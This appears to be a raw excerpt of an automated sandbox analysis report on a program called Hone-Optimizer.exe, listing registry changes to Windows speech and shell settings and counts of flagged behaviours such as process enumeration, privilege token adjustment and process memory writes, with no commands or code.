Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_es-ES.dat"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - ja-JP Embedded DNN v11.1"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "DebugPlugin"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_EnUS_ZiraM"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Stefan"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda - German (Germany)"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5218064"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Spanish (Spain)"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Elsa"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Italian (Italy)"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_HW_en-US.dat"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Lts Lexicon"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\fr-FR\\VoiceActivation_HW_fr-FR.dat"	Process not Found
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-870806430-2618236806-3023919190-1000\{4A6C98DF-B751-41E2-B825-2986AFC37D07}	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1033-110-WINMO-DNN"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Locale Handler"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Japanese (Japan)"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{14E74C62-DC97-43B0-8F2F-581496A65D60}"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5223743"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\r3082sr.lxa"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 4e003100000000006e59b55e1000486f6e6500003a0009000400efbe6e59b55e6e59c25e2e00000052500400000028000000000000000000000000000000313e7b0048006f006e006500000014000000	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\lsr3082.lxa"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE/SOFTWARE\\Microsoft\\Speech_OneCore\\AudioOutput\\TokenEnums\\MMAudioOut\\"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\c3082.fe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\MuiCache	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Laura"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5e003100000000006e592b5f1000484f4e4552457e310000460009000400efbe6e59b55e6e592b5f2e0000005450040000002800000000000000000000000000000055f4df0048006f006e006500520065007600650072007400000018000000	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "40C"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near"	Process not Found

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

pid	Process
1744	reg.exe
2532	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1772	powershell.exe
2452	powershell.exe
5112	powershell.exe
5112	powershell.exe
2008	WMIC.exe
2008	WMIC.exe
2008	WMIC.exe
2008	WMIC.exe
1772	powershell.exe
1772	powershell.exe
2452	powershell.exe
2452	powershell.exe
5112	powershell.exe
4476	WMIC.exe
4476	WMIC.exe
4476	WMIC.exe
4476	WMIC.exe
4692	WMIC.exe
4692	WMIC.exe
4692	WMIC.exe
4692	WMIC.exe
1220	powershell.exe
1220	powershell.exe
1220	powershell.exe
4516	powershell.exe
4516	powershell.exe
1960	powershell.exe
1960	powershell.exe
4820	WMIC.exe
4820	WMIC.exe
4820	WMIC.exe
4820	WMIC.exe
4448	WMIC.exe
4448	WMIC.exe
4448	WMIC.exe
4448	WMIC.exe
3532	WMIC.exe
3532	WMIC.exe
3532	WMIC.exe
3532	WMIC.exe
4432	powershell.exe
4432	powershell.exe
1264	WMIC.exe
1264	WMIC.exe
1264	WMIC.exe
1264	WMIC.exe
3776	powershell.exe
3776	powershell.exe
3688	powershell.exe
3688	powershell.exe
4304	powershell.exe
4304	powershell.exe
4560	WMIC.exe
4560	WMIC.exe
4560	WMIC.exe
4560	WMIC.exe
3100	WMIC.exe
3100	WMIC.exe
3100	WMIC.exe
3100	WMIC.exe
4676	WMIC.exe
4676	WMIC.exe
4676	WMIC.exe
4676	WMIC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	1212	tasklist.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeIncreaseQuotaPrivilege	2008	WMIC.exe
Token: SeSecurityPrivilege	2008	WMIC.exe
Token: SeTakeOwnershipPrivilege	2008	WMIC.exe
Token: SeLoadDriverPrivilege	2008	WMIC.exe
Token: SeSystemProfilePrivilege	2008	WMIC.exe
Token: SeSystemtimePrivilege	2008	WMIC.exe
Token: SeProfSingleProcessPrivilege	2008	WMIC.exe
Token: SeIncBasePriorityPrivilege	2008	WMIC.exe
Token: SeCreatePagefilePrivilege	2008	WMIC.exe
Token: SeBackupPrivilege	2008	WMIC.exe
Token: SeRestorePrivilege	2008	WMIC.exe
Token: SeShutdownPrivilege	2008	WMIC.exe
Token: SeDebugPrivilege	2008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2008	WMIC.exe
Token: SeRemoteShutdownPrivilege	2008	WMIC.exe
Token: SeUndockPrivilege	2008	WMIC.exe
Token: SeManageVolumePrivilege	2008	WMIC.exe
Token: 33	2008	WMIC.exe
Token: 34	2008	WMIC.exe
Token: 35	2008	WMIC.exe
Token: 36	2008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2008	WMIC.exe
Token: SeSecurityPrivilege	2008	WMIC.exe
Token: SeTakeOwnershipPrivilege	2008	WMIC.exe
Token: SeLoadDriverPrivilege	2008	WMIC.exe
Token: SeSystemProfilePrivilege	2008	WMIC.exe
Token: SeSystemtimePrivilege	2008	WMIC.exe
Token: SeProfSingleProcessPrivilege	2008	WMIC.exe
Token: SeIncBasePriorityPrivilege	2008	WMIC.exe
Token: SeCreatePagefilePrivilege	2008	WMIC.exe
Token: SeBackupPrivilege	2008	WMIC.exe
Token: SeRestorePrivilege	2008	WMIC.exe
Token: SeShutdownPrivilege	2008	WMIC.exe
Token: SeDebugPrivilege	2008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2008	WMIC.exe
Token: SeRemoteShutdownPrivilege	2008	WMIC.exe
Token: SeUndockPrivilege	2008	WMIC.exe
Token: SeManageVolumePrivilege	2008	WMIC.exe
Token: 33	2008	WMIC.exe
Token: 34	2008	WMIC.exe
Token: 35	2008	WMIC.exe
Token: 36	2008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2452	powershell.exe
Token: SeSecurityPrivilege	2452	powershell.exe
Token: SeTakeOwnershipPrivilege	2452	powershell.exe
Token: SeLoadDriverPrivilege	2452	powershell.exe
Token: SeSystemProfilePrivilege	2452	powershell.exe
Token: SeSystemtimePrivilege	2452	powershell.exe
Token: SeProfSingleProcessPrivilege	2452	powershell.exe
Token: SeIncBasePriorityPrivilege	2452	powershell.exe
Token: SeCreatePagefilePrivilege	2452	powershell.exe
Token: SeBackupPrivilege	2452	powershell.exe
Token: SeRestorePrivilege	2452	powershell.exe
Token: SeShutdownPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeSystemEnvironmentPrivilege	2452	powershell.exe
Token: SeRemoteShutdownPrivilege	2452	powershell.exe
Token: SeUndockPrivilege	2452	powershell.exe
Token: SeManageVolumePrivilege	2452	powershell.exe
Token: 33	2452	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
1900	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found
4232	Process not Found

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
2552	Process not Found
4660	Process not Found
552	Process not Found
4660	Process not Found
1692	Process not Found
2660	Process not Found
2016	Process not Found
2016	Process not Found
3400	Process not Found
2288	Process not Found
2368	Process not Found
2368	Process not Found
4052	Process not Found
3548	Process not Found
1444	Process not Found
1444	Process not Found
2624	Process not Found
2492	Process not Found
1212	Process not Found
1212	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2292 wrote to memory of 3632	2292	Hone-Optimizer.exe	82
PID 2292 wrote to memory of 3632	2292	Hone-Optimizer.exe	82
PID 3632 wrote to memory of 3088	3632	Hone-Optimizer.exe	84
PID 3632 wrote to memory of 3088	3632	Hone-Optimizer.exe	84
PID 3632 wrote to memory of 4932	3632	Hone-Optimizer.exe	85
